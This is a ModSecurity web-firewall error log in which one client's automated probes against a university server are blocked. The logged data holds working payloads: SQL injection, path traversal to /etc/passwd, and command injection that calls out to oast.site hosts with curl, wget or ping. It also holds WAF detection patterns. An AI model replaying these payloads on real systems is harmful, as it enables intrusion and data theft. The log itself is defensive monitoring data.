[Tue Aug 29 11:33:05.783785 2023] [:error] [pid 1111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARXH8oAAAAI"]
[Tue Aug 29 11:33:09.408636 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARH7MkAAAAM"]
[Tue Aug 29 11:33:09.935171 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARQ35wAAAAB"]
[Tue Aug 29 11:33:10.362194 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARD1SQAAAAH"]
[Tue Aug 29 11:33:11.331104 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAAQKOiUAAAAs"]
[Tue Aug 29 11:33:12.536558 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARNk8wAAAAS"]
[Tue Aug 29 11:33:12.627082 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg685aa4w6h1xkw.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg685aa4w6h1xkw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAANsAckAAAAD"]
[Tue Aug 29 11:33:12.784185 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARNk9EAAAAS"]
[Tue Aug 29 11:33:12.828842 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgzmi3tdx5i8d7d.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgzmi3tdx5i8d7d.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TcAAAAH"]
[Tue Aug 29 11:33:13.303446 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgbo3h7enwmxqw1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgbo3h7enwmxqw1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARdiHAAAAAK"]
[Tue Aug 29 11:33:13.343468 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg1qos9cnr8ib5n.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg1qos9cnr8ib5n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARA7ecAAAAA"]
[Tue Aug 29 11:33:14.404757 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAANsAdIAAAAD"]
[Tue Aug 29 11:33:14.479404 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARH7OUAAAAM"]
[Tue Aug 29 11:33:14.566954 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARD1T8AAAAH"]
[Tue Aug 29 11:33:15.969526 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlggzb8r1cogacsu.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11C8Co-f0AAARQ37sAAAAB"]
[Tue Aug 29 11:33:18.756734 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgomqjmd9jnahcg.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiHwAAAAK"]
[Tue Aug 29 11:33:19.031278 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARy-sEAAAAb"]
[Tue Aug 29 11:33:19.044169 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARwurAAAAAZ"]
[Tue Aug 29 11:33:19.319359 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARH7OsAAAAM"]
[Tue Aug 29 11:33:19.339990 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARH7OwAAAAM"]
[Tue Aug 29 11:33:20.375316 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARnmIcAAAAR"]
[Tue Aug 29 11:33:21.364918 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARnmIwAAAAR"]
[Tue Aug 29 11:33:22.396789 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgq4yq7pkjq7zks.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARzXxAAAAAd"]
[Tue Aug 29 11:33:23.305106 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARdiIkAAAAK"]
[Tue Aug 29 11:33:24.347370 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg4nc14j5onomf9.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARiDmkAAAAJ"]
[Tue Aug 29 11:33:24.371854 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARjjL8AAAAL"]
[Tue Aug 29 11:33:25.347033 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAAR2Z3sAAAAe"]
[Tue Aug 29 11:33:25.369407 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAAR2Z3wAAAAe"]
[Tue Aug 29 11:33:26.392476 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARt-8wAAAAV"]
[Tue Aug 29 11:33:26.447617 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARA7gIAAAAA"]
